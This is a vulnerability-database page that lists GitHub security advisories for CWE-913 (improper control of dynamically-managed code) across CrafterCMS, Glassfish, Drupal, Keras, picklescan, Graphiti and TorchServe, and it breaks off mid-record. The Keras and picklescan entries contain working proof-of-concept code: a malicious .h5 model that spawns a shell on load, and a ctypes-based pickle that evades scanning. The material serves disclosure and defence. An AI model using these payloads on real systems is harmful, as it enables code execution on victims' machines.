Common Weakness Enumeration

CWE-913

Allowed-with-Review

Improper Control of Dynamically-Managed Code Resources

Abstraction: Class · Status: Incomplete

The product does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements.

159 vulnerabilities reference this CWE, most recent first.

GHSA-2JV3-V37P-65W3

Vulnerability from github – Published: 2022-09-14 00:00 – Updated: 2023-09-11 22:15
VLAI
Summary
CrafterCMS Crafter Studio Improperly Controls Dynamically-Managed Code Resources
Details

Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via FreeMarker SSTI.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.craftercms:crafter-studio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.1.0"
            },
            {
              "fixed": "3.1.23"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-40634"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78",
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-09-20T18:04:54Z",
    "nvd_published_at": "2022-09-13T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via FreeMarker SSTI.",
  "id": "GHSA-2jv3-v37p-65w3",
  "modified": "2023-09-11T22:15:22Z",
  "published": "2022-09-14T00:00:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40634"
    },
    {
      "type": "WEB",
      "url": "https://docs.craftercms.org/en/3.1/security/advisory.html#cv-2022051601"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftercms/studio"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "CrafterCMS Crafter Studio Improperly Controls Dynamically-Managed Code Resources"
}

GHSA-2MW4-WJ8C-7F93

Vulnerability from github – Published: 2023-11-03 09:32 – Updated: 2023-11-03 19:46
VLAI
Summary
Eclipse Glassfish remote code execution issue
Details

In Eclipse Glassfish 5 or 6, running with old versions of JDK (lower than 6u211, or < 7u201, or < 8u191), allows remote attackers to load malicious code on the server via access to insecure ORB listeners.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.glassfish.main.orb:orb-connector"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "7.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-5763"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-11-03T19:46:48Z",
    "nvd_published_at": "2023-11-03T07:15:14Z",
    "severity": "MODERATE"
  },
  "details": "In Eclipse Glassfish 5 or 6, running with old versions of JDK (lower than 6u211, or \u003c 7u201, or \u003c 8u191), allows remote attackers to load malicious code on the server via access to insecure ORB listeners.\n",
  "id": "GHSA-2mw4-wj8c-7f93",
  "modified": "2023-11-03T19:46:48Z",
  "published": "2023-11-03T09:32:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5763"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/14"
    },
    {
      "type": "WEB",
      "url": "https://glassfish.org/docs/latest/security-guide.html#securing-glassfish-server"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Eclipse Glassfish remote code execution issue"
}

GHSA-2QPH-Q8XW-GV7Q

Vulnerability from github – Published: 2025-04-01 00:30 – Updated: 2025-04-01 19:06
VLAI
Summary
Drupal Core Improperly Controlled Modification of Dynamically-Determined Object Attributes Vulnerability
Details

Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Drupal Drupal core allows Object Injection.This issue affects Drupal core: from 8.0.0 before 10.3.13, from 10.4.0 before 10.4.3, from 11.0.0 before 11.0.12, from 11.1.0 before 11.1.3.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "drupal/core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "8.0.0"
            },
            {
              "fixed": "10.3.13"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "drupal/core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.4.0"
            },
            {
              "fixed": "10.4.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "drupal/core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "11.0.0"
            },
            {
              "fixed": "11.0.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "drupal/core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "11.1.0"
            },
            {
              "fixed": "11.1.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-31674"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-01T19:06:02Z",
    "nvd_published_at": "2025-03-31T22:15:19Z",
    "severity": "MODERATE"
  },
  "details": "Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Drupal Drupal core allows Object Injection.This issue affects Drupal core: from 8.0.0 before 10.3.13, from 10.4.0 before 10.4.3, from 11.0.0 before 11.0.12, from 11.1.0 before 11.1.3.",
  "id": "GHSA-2qph-q8xw-gv7q",
  "modified": "2025-04-01T19:06:02Z",
  "published": "2025-04-01T00:30:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-31674"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/drupal/core"
    },
    {
      "type": "WEB",
      "url": "https://www.drupal.org/sa-core-2025-003"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Drupal Core Improperly Controlled Modification of Dynamically-Determined Object Attributes Vulnerability"
}

GHSA-2W3F-9W3Q-QW77

Vulnerability from github – Published: 2021-10-12 18:30 – Updated: 2021-10-20 17:12
VLAI
Summary
Prototype Pollution in config-handler
Details

All versions of package config-handler are vulnerable to Prototype Pollution when loading config files.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "config-handler"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-23448"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-10-12T17:01:08Z",
    "nvd_published_at": "2021-10-11T21:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "All versions of package config-handler are vulnerable to Prototype Pollution when loading config files.",
  "id": "GHSA-2w3f-9w3q-qw77",
  "modified": "2021-10-20T17:12:24Z",
  "published": "2021-10-12T18:30:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23448"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jarradseers/config-handler/issues/1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jarradseers/config-handler"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-CONFIGHANDLER-1564947"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution in config-handler"
}

GHSA-36RR-WW3J-VRJV

Vulnerability from github – Published: 2025-09-19 20:12 – Updated: 2026-06-06 00:33
VLAI
Summary
The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.
Details

Note: This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I’ve chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your SECURITY.md, but received no response.


Summary

When a model in the .h5 (or .hdf5) format is loaded using the Keras Model.load_model method, the safe_mode=True setting is silently ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim’s machine with the same privileges as the Keras application. This report is specific to the .h5/.hdf5 file format. The attack works regardless of the other parameters passed to load_model and does not require any sophisticated technique—.h5 and .hdf5 files are simply not checked for unsafe code execution.

From this point on, I will refer only to the .h5 file format, though everything equally applies to .hdf5.

Details

Intended behaviour

According to the official Keras documentation, safe_mode is defined as:

safe_mode: Boolean, whether to disallow unsafe lambda deserialization. When safe_mode=False, loading an object has the potential to trigger arbitrary code execution. This argument is only applicable to the Keras v3 model format. Defaults to True.

I understand that the behavior described in this report is somehow intentional, as safe_mode is only applicable to .keras models.

However, in practice, this behavior is misleading for users who are unaware of the internal Keras implementation. .h5 files can still be loaded seamlessly using load_model with safe_mode=True, and the absence of any warning or error creates a false sense of security. Whether intended or not, I believe silently ignoring a security-related parameter is not the best possible design decision. At a minimum, if safe_mode cannot be applied to a given file format, an explicit error should be raised to alert the user.

This issue is particularly critical given the widespread use of the .h5 format, despite the introduction of newer formats.

As a small anecdotal test, I asked several of my colleagues what they would expect when loading a .h5 file with safe_mode=True. None of them expected the setting to be silently ignored, even after reading the documentation. While this is a small sample, all of these colleagues are cybersecurity researchers—experts in binary or ML security—and regular participants in DEF CON finals. I was careful not to give any hints about the vulnerability in our discussion.

Technical Details

Examining the implementation of load_model in keras/src/saving/saving_api.py, we can see that the safe_mode parameter is completely ignored when loading .h5 files. Here's the relevant snippet:

def load_model(filepath, custom_objects=None, compile=True, safe_mode=True):
    is_keras_zip = ...
    is_keras_dir = ...
    is_hf = ...

    # Support for remote zip files
    if (
        file_utils.is_remote_path(filepath)
        and not file_utils.isdir(filepath)
        and not is_keras_zip
        and not is_hf
    ):
        ...

    if is_keras_zip or is_keras_dir or is_hf:
        ...

    if str(filepath).endswith((".h5", ".hdf5")):
        return legacy_h5_format.load_model_from_hdf5(
            filepath, custom_objects=custom_objects, compile=compile
        )

As shown, when the file format is .h5 or .hdf5, the method delegates to legacy_h5_format.load_model_from_hdf5, which does not use or check the safe_mode parameter at all.

Solution

Since the release of the new .keras format, I believe the simplest and most effective way to address this misleading behavior—and to improve security in Keras—is to have the safe_mode parameter raise an explicit error when safe_mode=True is used with .h5/.hdf5 files. This error should be clear and informative, explaining that the legacy format does not support safe_mode and outlining the associated risks of loading such files.

I recognize this fix may have minor backward compatibility considerations.

If you confirm that you're open to this approach, I’d be happy to open a PR that includes the missing check.

PoC

From the attacker’s perspective, creating a malicious .h5 model is as simple as the following:

import keras

f = lambda x: (
    exec("import os; os.system('sh')"),
    x,
)

model = keras.Sequential()
model.add(keras.layers.Input(shape=(1,)))
model.add(keras.layers.Lambda(f))
model.compile()

keras.saving.save_model(model, "./provola.h5")

From the victim’s side, triggering code execution is just as simple:

import keras

model = keras.models.load_model("./provola.h5", safe_mode=True)

That’s all. The exploit occurs during model loading, with no further interaction required. The parameters passed to the method do not mitigate of influence the attack in any way.

As expected, the attacker can substitute the exec(...) call with any payload. Whatever command is used will execute with the same permissions as the Keras application.

Attack scenario

The attacker may distribute a malicious .h5/.hdf5 model on platforms such as Hugging Face, or act as a malicious node in a federated learning environment. The victim only needs to load the model—even with safe_mode=True that would give the illusion of security. No inference or further action is required, making the threat particularly stealthy and dangerous.

Once the model is loaded, the attacker gains the ability to execute arbitrary code on the victim’s machine with the same privileges as the Keras process. The provided proof-of-concept demonstrates a simple shell spawn, but any payload could be delivered this way.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keras"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.11.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-9905"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-19T20:12:05Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "**Note:** This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I\u2019ve chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your `SECURITY.md`, but received no response.\n\n---\n\n## Summary\n\nWhen a model in the `.h5` (or `.hdf5`) format is loaded using the Keras `Model.load_model` method, the `safe_mode=True` setting is **silently** ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim\u2019s machine with the same privileges as the Keras application. This report is specific to the `.h5`/`.hdf5` file format. The attack works regardless of the other parameters passed to `load_model` and does not require any sophisticated technique\u2014`.h5` and `.hdf5` files are simply not checked for unsafe code execution.\n\nFrom this point on, I will refer only to the `.h5` file format, though everything equally applies to `.hdf5`.\n\n## Details\n\n### Intended behaviour \nAccording to the official Keras documentation, `safe_mode` is defined as:\n\n```\nsafe_mode: Boolean, whether to disallow unsafe lambda deserialization. When safe_mode=False, loading an object has the potential to trigger arbitrary code execution. This argument is only applicable to the Keras v3 model format. Defaults to True.\n```\nI understand that the behavior described in this report is somehow **intentional**, as `safe_mode` is only applicable to `.keras` models. \n\nHowever, in practice, this behavior is misleading for users who are unaware of the internal Keras implementation. `.h5` files can still be loaded seamlessly using `load_model` with `safe_mode=True`, and the absence of any warning or error creates a **false sense of security**. Whether intended or not, I believe silently ignoring a security-related parameter is not the best possible design decision. At a minimum, if `safe_mode` cannot be applied to a given file format, an explicit error should be raised to alert the user.\n\nThis issue is particularly critical given the widespread use of the `.h5` format, despite the introduction of newer formats.\n\nAs a small anecdotal test, I asked several of my colleagues what they would expect when loading a `.h5` file with `safe_mode=True`. None of them expected the setting to be **silently** ignored, even after reading the documentation. While this is a small sample, all of these colleagues are cybersecurity researchers\u2014experts in binary or ML security\u2014and regular participants in DEF CON finals. I was careful not to give any hints about the vulnerability in our discussion.\n\n### Technical Details\n\nExamining the implementation of `load_model` in `keras/src/saving/saving_api.py`, we can see that the `safe_mode` parameter is completely ignored when loading `.h5` files. Here\u0027s the relevant snippet:\n\n```python\ndef load_model(filepath, custom_objects=None, compile=True, safe_mode=True):\n    is_keras_zip = ...\n    is_keras_dir = ...\n    is_hf = ...\n\n    # Support for remote zip files\n    if (\n        file_utils.is_remote_path(filepath)\n        and not file_utils.isdir(filepath)\n        and not is_keras_zip\n        and not is_hf\n    ):\n        ...\n\n    if is_keras_zip or is_keras_dir or is_hf:\n        ...\n\n    if str(filepath).endswith((\".h5\", \".hdf5\")):\n        return legacy_h5_format.load_model_from_hdf5(\n            filepath, custom_objects=custom_objects, compile=compile\n        )\n```\n\nAs shown, when the file format is `.h5` or `.hdf5`, the method delegates to `legacy_h5_format.load_model_from_hdf5`, which does not use or check the `safe_mode` parameter at all.\n\n### Solution\n\nSince the release of the new `.keras` format, I believe the simplest and most effective way to address this misleading behavior\u2014and to improve security in Keras\u2014is to have the `safe_mode` parameter raise an **explicit error** when `safe_mode=True` is used with `.h5`/`.hdf5` files. This error should be clear and informative, explaining that the legacy format does not support `safe_mode` and outlining the associated risks of loading such files.\n\nI recognize this fix may have minor backward compatibility considerations.\n\nIf you confirm that you\u0027re open to this approach, I\u2019d be happy to open a PR that includes the missing check.\n\n\n## PoC\n\nFrom the attacker\u2019s perspective, creating a malicious `.h5` model is as simple as the following:\n\n```python\nimport keras\n\nf = lambda x: (\n    exec(\"import os; os.system(\u0027sh\u0027)\"),\n    x,\n)\n\nmodel = keras.Sequential()\nmodel.add(keras.layers.Input(shape=(1,)))\nmodel.add(keras.layers.Lambda(f))\nmodel.compile()\n\nkeras.saving.save_model(model, \"./provola.h5\")\n```\n\nFrom the victim\u2019s side, triggering code execution is just as simple:\n\n```python\nimport keras\n\nmodel = keras.models.load_model(\"./provola.h5\", safe_mode=True)\n```\n\nThat\u2019s all. The exploit occurs **during model loading**, with no further interaction required. The parameters passed to the method do not mitigate of influence the attack in any way.\n\n\nAs expected, the attacker can substitute the `exec(...)` call with any payload. Whatever command is used will execute with the same permissions as the Keras application.\n\n## Attack scenario\n\nThe attacker may distribute a malicious `.h5`/`.hdf5` model on platforms such as Hugging Face, or act as a malicious node in a federated learning environment. The victim only needs to load the model\u2014*even with* `safe_mode=True` that would give the illusion of security. No inference or further action is required, making the threat particularly stealthy and dangerous.\n\nOnce the model is loaded, the attacker gains the ability to execute arbitrary code on the victim\u2019s machine with the same privileges as the Keras process. The provided proof-of-concept demonstrates a simple shell spawn, but any payload could be delivered this way.",
  "id": "GHSA-36rr-ww3j-vrjv",
  "modified": "2026-06-06T00:33:31Z",
  "published": "2025-09-19T20:12:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9905"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/pull/21602"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/keras-team/keras"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/keras/PYSEC-2025-123.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded."
}

GHSA-3M5V-4XP5-GJG2

Vulnerability from github – Published: 2026-03-20 15:58 – Updated: 2026-03-25 21:33
VLAI
Summary
Graphiti Affected by Arbitrary Method Execution via Unvalidated Relationship Names
Details

Summary

An arbitrary method execution vulnerability has been found which affects Graphiti's JSONAPI write functionality. An attacker can craft a malicious JSONAPI payload with arbitrary relationship names to invoke any public method on the underlying model instance, class or its associations.

Impact

Any application exposing Graphiti write endpoints (create/update/delete) to untrusted users is affected.

The Graphiti::Util::ValidationResponse#all_valid? method recursively calls model.send(name) using relationship names taken directly from user-supplied JSONAPI payloads, without validating them against the resource's configured sideloads. This allows an attacker to potentially run any public method on a given model instance, on the instance class or associated instances or classes, including destructive operations.

Patches

This is patched in Graphiti v1.10.2. Users should upgrade as soon as possible.

Workarounds

If upgrading to v1.10.2 is not immediately possible, consider one or more of the following mitigations:

  • Restrict write access: Ensure Graphiti write endpoints (create/update/delete) are not accessible to untrusted users.
  • Authentication & authorisation: Apply strong authentication and authorisation checks before any write operation is processed, for example use Rails strong parameters to ensure only valid parameters are processed.
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.10.1"
      },
      "package": {
        "ecosystem": "RubyGems",
        "name": "graphiti"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.10.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33286"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T15:58:14Z",
    "nvd_published_at": "2026-03-24T00:16:30Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nAn arbitrary method execution vulnerability has been found which affects Graphiti\u0027s JSONAPI write functionality. An attacker can craft a malicious JSONAPI payload with arbitrary relationship names to invoke any public method on the underlying model instance, class or its associations.\n\n### Impact\n\nAny application exposing Graphiti write endpoints (create/update/delete) to untrusted users is affected. \n\nThe `Graphiti::Util::ValidationResponse#all_valid?` method recursively calls `model.send(name)` using relationship names taken directly from user-supplied JSONAPI payloads, without validating them against the resource\u0027s configured sideloads. This allows an attacker to potentially run any public method on a given model instance, on the instance class or associated instances or classes, including destructive operations.\n\n### Patches\n\nThis is patched in Graphiti **v1.10.2**. Users should upgrade as soon as possible.\n\n### Workarounds\n\nIf upgrading to v1.10.2 is not immediately possible, consider one or more of the following mitigations:\n\n- **Restrict write access**: Ensure Graphiti write endpoints (create/update/delete) are not accessible to untrusted users.\n- **Authentication \u0026 authorisation**: Apply strong authentication and authorisation checks before any write operation is processed, for example use Rails strong parameters to ensure only valid parameters are processed.",
  "id": "GHSA-3m5v-4xp5-gjg2",
  "modified": "2026-03-25T21:33:29Z",
  "published": "2026-03-20T15:58:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/graphiti-api/graphiti/security/advisories/GHSA-3m5v-4xp5-gjg2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33286"
    },
    {
      "type": "WEB",
      "url": "https://github.com/graphiti-api/graphiti/commit/ddb5ad2b69330774bd1a47935ed89a9fe4396a54"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/graphiti-api/graphiti"
    },
    {
      "type": "WEB",
      "url": "https://github.com/graphiti-api/graphiti/releases/tag/v1.10.2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/graphiti/CVE-2026-33286.yml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Graphiti Affected by Arbitrary Method Execution via Unvalidated Relationship Names"
}

GHSA-4675-36F9-WF6R

Vulnerability from github – Published: 2025-12-29 15:23 – Updated: 2026-06-18 14:44
VLAI
Summary
Picklescan does not block ctypes
Details

Summary

Picklescan doesnt flag ctypes module as a dangerous module, which is a huge issue. ctypes is basically a foreign function interface library and can be used to * Load DLLs * Call C functions directly * Manipulate memory raw pointers.

This can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue that ctypes being allowed presents is that it can be used down the line to dismantle interpreter based python sandboxes as ctypes allow direct access to raw memory.

This is a more severe loophole than normal gadget chains and bypasses as raw memory access can be used for a lot of nefarious purposes down the line if left undetected

PoC

import pickle
import ctypes
import operator

class Kernel32Loader:
    def __reduce__(self):
        #we go direct to the kerneeellllllll
        return (ctypes.WinDLL, ("kernel32.dll",))

class WinExecGetter:
    def __reduce__(self):
        return (operator.itemgetter("WinExec"), (Kernel32Loader(),))

class PopCalc:
    def __reduce__(self):
        #methodcaller to invoke "__call__" on the function pointer.
        return (
            operator.methodcaller("__call__", b"calc.exe", 1), 
            (WinExecGetter(),)
        )

try:
    payload = pickle.dumps(PopCalc())

    with open("calc_exploit.pkl", "wb") as f:
        f.write(payload)

    print("Generated 'calc_exploit.pkl'")

except Exception as e:
    print(f"Generation failed: {e}")

This will create a pickle file which is not detected by the latest version of picklescan as malicious

import pickle
print("Loading bypass.pkl...")
pickle.load(open("calc_exploit.pkl", "rb"))

image

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "picklescan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.33"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-71323"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-29T15:23:49Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nPicklescan doesnt flag ctypes module as a dangerous module, which is a huge issue. ctypes is basically a foreign function interface library and can be used to\n* Load DLLs\n* Call C functions directly\n* Manipulate memory raw pointers.\n\nThis can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue that ctypes being allowed presents is that it can be used down the line to dismantle interpreter based python sandboxes as ctypes allow direct access to raw memory.\n\nThis is a more severe loophole than normal gadget chains and bypasses as raw memory access can be used for a lot of nefarious purposes down the line if left undetected\n\n### PoC\n```python\nimport pickle\nimport ctypes\nimport operator\n\nclass Kernel32Loader:\n    def __reduce__(self):\n        #we go direct to the kerneeellllllll\n        return (ctypes.WinDLL, (\"kernel32.dll\",))\n\nclass WinExecGetter:\n    def __reduce__(self):\n        return (operator.itemgetter(\"WinExec\"), (Kernel32Loader(),))\n\nclass PopCalc:\n    def __reduce__(self):\n        #methodcaller to invoke \"__call__\" on the function pointer.\n        return (\n            operator.methodcaller(\"__call__\", b\"calc.exe\", 1), \n            (WinExecGetter(),)\n        )\n\ntry:\n    payload = pickle.dumps(PopCalc())\n    \n    with open(\"calc_exploit.pkl\", \"wb\") as f:\n        f.write(payload)\n        \n    print(\"Generated \u0027calc_exploit.pkl\u0027\")\n\nexcept Exception as e:\n    print(f\"Generation failed: {e}\")\n```\nThis will create a pickle file which is not detected by the latest version of picklescan as malicious\n\n```python\nimport pickle\nprint(\"Loading bypass.pkl...\")\npickle.load(open(\"calc_exploit.pkl\", \"rb\"))\n```\n\n\u003cimg width=\"1333\" height=\"677\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f5b066f3-116a-4377-a538-f293f3a6c176\" /\u003e",
  "id": "GHSA-4675-36f9-wf6r",
  "modified": "2026-06-18T14:44:57Z",
  "published": "2025-12-29T15:23:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-4675-36f9-wf6r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71323"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/pull/53"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mmaitre314/picklescan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/picklescan-remote-code-execution-via-unblocked-ctypes-module"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Picklescan does not block ctypes"
}

GHSA-4MQG-H5JF-J9M7

Vulnerability from github – Published: 2023-10-02 20:38 – Updated: 2023-10-02 20:38
VLAI
Summary
TorchServe Pre-Auth Remote Code Execution
Details

Impact

Use of Open Source Library potentially exposed to RCE Issue: Use of a version of the SnakeYAML v1.31open source library with multiple issues that potentially exposes the user to unsafe deserialization of Java objects. This could allow third parties to execute arbitrary code on the target system. This issue is present in versions 0.3.0 to 0.8.1. Mitigation: A pull request to address this issue has been merged - https://github.com/pytorch/serve/pull/2523. TorchServe release 0.8.2 includes this fix.

Patches

TorchServe release 0.8.2 includes fixes to address the previously listed issue:

https://github.com/pytorch/serve/releases/tag/v0.8.2

Tags for upgraded DLC release User can use the following new image tags to pull DLCs that ship with patched TorchServe version 0.8.2: x86 GPU

  • v1.9-pt-ec2-2.0.1-inf-gpu-py310
  • v1.8-pt-sagemaker-2.0.1-inf-gpu-py310

x86 CPU

  • v1.8-pt-ec2-2.0.1-inf-cpu-py310
  • v1.7-pt-sagemaker-2.0.1-inf-cpu-py310

Graviton

  • v1.7-pt-graviton-ec2-2.0.1-inf-cpu-py310
  • v1.5-pt-graviton-sagemaker-2.0.1-inf-cpu-py310

Neuron

  • 1.13.1-neuron-py310-sdk2.13.2-ubuntu20.04
  • 1.13.1-neuronx-py310-sdk2.13.2-ubuntu20.04
  • 1.13.1-neuronx-py310-sdk2.13.2-ubuntu20.04

The full DLC image URI details can be found at: https://github.com/aws/deep-learning-containers/blob/master/available_images.md#available-deep-learning-containers-images

References

https://github.com/pytorch/serve/pull/2523 https://github.com/pytorch/serve/releases/tag/v0.8.2 https://github.com/aws/deep-learning-containers/blob/master/available_images.md#available-deep-learning-containers-images

Credit

We would like to thank Oligo Security for responsibly disclosing this issue and working with us on its resolution. If you have any questions or comments about this advisory, we ask that you contact AWS/Amazon Security via our vulnerability reporting page](https://aws.amazon.com/security/vulnerability-reporting)) or directly via email to aws-security@amazon.com. Please do not create a public GitHub issue.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "torchserve"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.3.0"
            },
            {
              "fixed": "0.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-10-02T20:38:07Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
